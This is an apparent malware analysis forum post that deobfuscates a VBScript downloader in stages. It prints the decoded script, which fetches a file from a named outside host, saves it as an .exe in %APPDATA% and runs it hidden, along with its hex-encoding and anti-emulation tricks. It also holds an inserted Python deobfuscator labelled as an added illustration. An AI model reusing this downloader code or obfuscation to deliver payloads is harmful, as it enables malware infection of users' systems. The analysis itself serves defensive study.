- May 14, 2016
1.vbs
VirusTotal : 2/53
https://www.virustotal.com/en/file/...bb68230d813bf8272f74b4409f337870a12/analysis/
exe file dropped : BehavesLike.Win32.ZeroAccess.mm
saved under a temporary random name + ".exe" (here radB8945.tmp.exe) in %APPDATA%\ ("C:\Users\DardiM\AppData\Roaming\")
As usual, I will analyse the downloader script by deobfuscating it.
I have chosen this sample because it is fresh and not currently detected by most AV / anti-malware tools.
After I unzipped 1.vbs, when I began this post :
- Not detected by KTS, ZAM (licence)
- Detected by Crystal Security cloud engine as soon as I ran it (CS) : 4 AVs
- VoodooShield detected it and reported 2 threats : blocking both files was recommended
Script used : Visual Basic Scripting (VBScript)
(1) Quick analysis
This script contains 34 lines of 2049 chars and 1 line of 2080 chars.
The 34 lines are only there to make it "harder" to see the real interesting part.
If you open the file with "wrap" enabled, it looks like an incoherent "language" everywhere (or maybe an extraterrestrial language)
=> it's better to deactivate this option to analyse our sample.
All 34 useless lines begin with the char ' => normally used to put a comment in code; here it is used to pad the script with text that obfuscates the whole thing a lot more, but as they are comments, all these lines can be deleted.
We can eliminate all the lines beginning with the char ' :
'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p 4Izb0R12im gZm2t DKzTAZyWlJB6ZijnbHdYrcSKhUNhAKcj3aZCsMG03pqB sxkGwG djwY40Zt mJt3hFxEiLON xDYrQD1 PFXmOZITUoie5NJC REu ..............
We then keep only line 17, which contains the really important part
=> line 17 :
Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):Next:JXAHJSM= a:End Function:Execute(JXAHJSM("4F6E204572726F72205265737 ................456E642049663A")):
The first function is not too hard to understand : it receives a string as parameter (only a small part is shown above because the string is 1948 chars long) and processes it 2 chars at a time :
Chr("&H" & Mid(s,g,2)) => HEX to ASCII conversion (each pair of hex digits becomes one character)
The second call, Execute, runs the decoded string as VBScript code.
(2) HEX to ASCII
On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then
Function CEKFRDUO(POGQVLS):set CEKFRDUO=CreateObject(POGQVLS):End Function:
Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):
Set UZWAFBHXM=CEKFRDUO(JXAHJSM("575363726970742E5368656C6C")):
Set CXAKA=CEKFRDUO(JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):
Set HSKWV=CEKFRDUO(JXAHJSM("41444F44422E53747265616D")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open JXAHJSM("474554"),JXAHJSM("687474703A2F2F676F706C6472746F702E746F702F6C6F672E7068703F663D312E6A7067"),0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+JXAHJSM("2E657865"):
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:
We can see in the spoiler that the main conversion function is called several times more.
(3) HEX to ASCII one more time
On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then
Function CEKFRDUO(POGQVLS):set CEKFRDUO=CreateObject(POGQVLS):End Function:
Set WCQXGR=CEKFRDUO("Scripting.FileSystemObject"):
Set UZWAFBHXM=CEKFRDUO("WScript.Shell"):
Set CXAKA=CEKFRDUO("WinHttp.WinHttpRequest.5.1"):
Set HSKWV=CEKFRDUO("ADODB.Stream"):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+".exe":
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:
It's now easier to understand some parts.
Let's simplify some parts (rename the variables and split the statements) to make them completely deobfuscated.
(4) Last step, with some formatting
On Error Resume Next
CreateObject("dc")
If Err.Number>0 Then
    Function func_CreateObject(string_object)
        Set func_CreateObject=CreateObject(string_object)
    End Function
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set shell=CreateObject("WScript.Shell")
    Set obj_http=CreateObject("WinHttp.WinHttpRequest.5.1")
    Set obj_ADODBStream=CreateObject("ADODB.Stream")
    temp_Path=fso.BuildPath(shell.ExpandEnvironmentStrings("%APPDATA%"),fso.GetTempName)
    On Error Resume Next
    Err.Clear
    obj_http.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0
    If Err=0 Then
        obj_http.Send
        obj_ADODBStream.Type=1
        obj_ADODBStream.Open
        obj_ADODBStream.Write obj_http.ResponseBody
        obj_ADODBStream.Position=0
        temp_Path=temp_Path+".exe"
        Set file=fso.CreateTextFile(temp_Path)
        For QJCXYOBP=0 to lenb(obj_http.ResponseBody)-1
            file.Write chr(ascb(obj_ADODBStream.Read(1)))
        Next
        file.Close
        shell.Run temp_Path,0
    End If
End If
I wrote "NAME.php" only for security; that's not the real file name.
On Error Resume Next => specifies that when a run-time error occurs, control goes to the statement immediately following the one where the error occurred, and execution continues from that point.
On Error Resume Next:CreateObject("dc") => generates an error that is expected, because "dc" is not a valid object name (ProgID) for the CreateObject function.
If Err.Number>0 Then => right : the script can continue, because the first CreateObject "worked" as expected, i.e. it failed. This also acts as a cheap sanity check for the malware: an emulator that lets CreateObject("dc") succeed silently would never reach the payload.
The objects created afterwards :
"WScript.Shell" to get the %APPDATA% folder and, at the end, to run the exe file
"Scripting.FileSystemObject" to build a path from %APPDATA% and a temp file name (GetTempName gives a random temp file name with a .tmp extension) and to create the file
"WinHttp.WinHttpRequest.5.1" object used for the HTTP request
"ADODB.Stream" to hold (in a memory stream) the content of the HTTP response (ResponseBody), which is then written byte by byte (chr(ascb(Read(1)))) to the .exe file
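As an added illustration (my own code, not the author's), a small Python deobfuscator that automates steps (1) to (4) on a constructed sample in the same shape as 1.vbs: it strips the ' padding lines, inlines the Execute(JXAHJSM(...)) payload, decodes the remaining JXAHJSM(hex) literals, then splits the one-liner into statements without cutting the URL at its ':'. The sample script, the example.invalid URL and the Python function names are assumptions made here; JXAHJSM is the decoder name taken from the sample.

```python
import re

# The sample's decoder is named JXAHJSM; both regexes target that name (constructed, not the page's code).
EXEC_CALL = re.compile(r'Execute\(JXAHJSM\("([0-9A-Fa-f]+)"\)\)')
HEX_CALL = re.compile(r'JXAHJSM\("([0-9A-Fa-f]+)"\)')

def hex_to_ascii(s: str) -> str:
    """Python port of JXAHJSM: Chr("&H" & Mid(s,g,2)) for each pair of hex digits."""
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))

def strip_junk_comments(script: str) -> str:
    """Drop the padding lines that begin with ' (a VBScript comment)."""
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("'"))

def deobfuscate(script: str, max_rounds: int = 5) -> str:
    """Steps 2/3: inline Execute(JXAHJSM(hex)) as code, then turn each JXAHJSM(hex) into a literal."""
    text = strip_junk_comments(script)
    for _ in range(max_rounds):
        new = EXEC_CALL.sub(lambda m: hex_to_ascii(m.group(1)), text)
        # a '"' inside a VBScript string literal is written as '""'
        new = HEX_CALL.sub(lambda m: '"' + hex_to_ascii(m.group(1)).replace('"', '""') + '"', new)
        if new == text:
            break  # nothing left to decode
        text = new
    return text

def split_statements(line: str) -> list:
    """Step 4: one statement per entry, splitting on ':' only outside string literals ("http://...")."""
    out, cur, in_str = [], [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        if ch == ":" and not in_str:
            if "".join(cur).strip():
                out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if "".join(cur).strip():
        out.append("".join(cur).strip())
    return out

# Constructed sample (not the real 1.vbs); the payload hex is built from STAGE2 so it stays readable.
STAGE2 = ('On Error Resume Next:CreateObject("dc"):If Err.Number>0 Then '
          'Set WCQXGR=CreateObject(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):'
          'CXAKA.Open JXAHJSM("474554"),"http://example.invalid/",0:End If')
SAMPLE = "\n".join([
    "'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p junk padding",
    'Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):'
    'Next:JXAHJSM= a:End Function:Execute(JXAHJSM("' + STAGE2.encode("ascii").hex().upper() + '")):',
])
```

Running `split_statements(deobfuscate(SAMPLE))` yields the decoded script one statement per line, with the ProgIDs and the URL readable and the http:// URL left intact.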
(5) Conclusion
No need for a complicated obfuscation method to do its job ...
They could have written a more complicated conversion function too ... so thanks to them